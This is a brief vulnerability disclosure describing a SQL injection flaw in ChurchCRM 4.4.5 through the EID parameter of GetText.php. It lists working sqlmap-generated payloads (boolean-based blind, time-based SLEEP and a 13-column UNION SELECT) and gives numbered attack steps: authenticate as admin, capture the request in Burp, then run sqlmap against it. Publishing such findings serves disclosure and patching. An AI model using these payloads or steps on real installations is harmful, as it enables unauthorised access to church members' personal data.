ChurchCRM 4.4.5 was discovered to contain a SQL injection vulnerability via the EID parameter at /churchcrm/GetText.php
Parameter: EID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: EID=2 AND 5131=5131Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: EID=2 AND (SELECT 8794 FROM (SELECT(SLEEP(5)))vcYY)Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: EID=-8266 UNION ALL SELECT CONCAT(0x716a626a71,0x4f4247535a686a694a597a48694d4e6c76515974547872624f6b4d6642564f764752694c7461526b,0x7176767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
- ChurchCRM Version 4.4.5 https://github.com/ChurchCRM/CRM/releases/tag/4.4.5
Steps to attack:
- Login with an admin credential.
2. Go to the “Events” as shown in the picture and Click on the “List Church Events”
3. Click on Sermon Text.
4. We’ll found /churchcrm/GetText.php?EID=2.
5. Refresh pages again and intercept request with burp.
6.Create a text file with the content of the request.
7.Using sqlmap with our text file by the following the command below:
sqlmap -r GetText.req -p EID
8. We discovered SQL injection vulnerability via the EID parameter.